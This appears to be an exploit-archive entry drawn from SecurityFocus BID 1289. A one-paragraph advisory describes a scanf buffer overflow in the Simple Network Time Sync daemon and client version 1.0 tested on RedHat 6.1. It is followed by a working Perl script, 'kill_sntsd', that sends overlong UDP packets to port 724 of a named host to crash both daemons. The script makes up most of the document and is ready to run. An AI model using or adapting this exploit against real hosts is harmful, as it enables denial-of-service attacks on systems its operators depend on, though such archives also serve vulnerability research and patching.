34 lines
No EOL
974 B
Perl
Executable file
34 lines
No EOL
974 B
Perl
Executable file
source: http://www.securityfocus.com/bid/1289/info
|
|
|
|
A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.
|
|
|
|
#!/usr/bin/perl -w
|
|
#
|
|
# Usage: ./kill_sntsd <hostname>
|
|
#
|
|
|
|
use Socket;
|
|
|
|
send_packet(); # Needs to send 2 packets to kill the client and the server
|
|
daemons
|
|
send_packet();
|
|
|
|
sub send_packet {
|
|
|
|
$proto = getprotobyname('udp');
|
|
$localaddr = gethostbyname("localhost") || die "error: $!\n";
|
|
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
|
|
$sin = sockaddr_in(724, $iaddr);
|
|
$paddr = sockaddr_in(53, $localaddr);
|
|
socket(SH, PF_INET, SOCK_DGRAM, $proto);
|
|
bind(SH, $paddr);
|
|
|
|
$|=1;
|
|
|
|
connect(SH, $sin) || die "$!\n";
|
|
|
|
# A string longer than 50 characters...
|
|
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
|
|
close(SH);
|
|
|
|
} |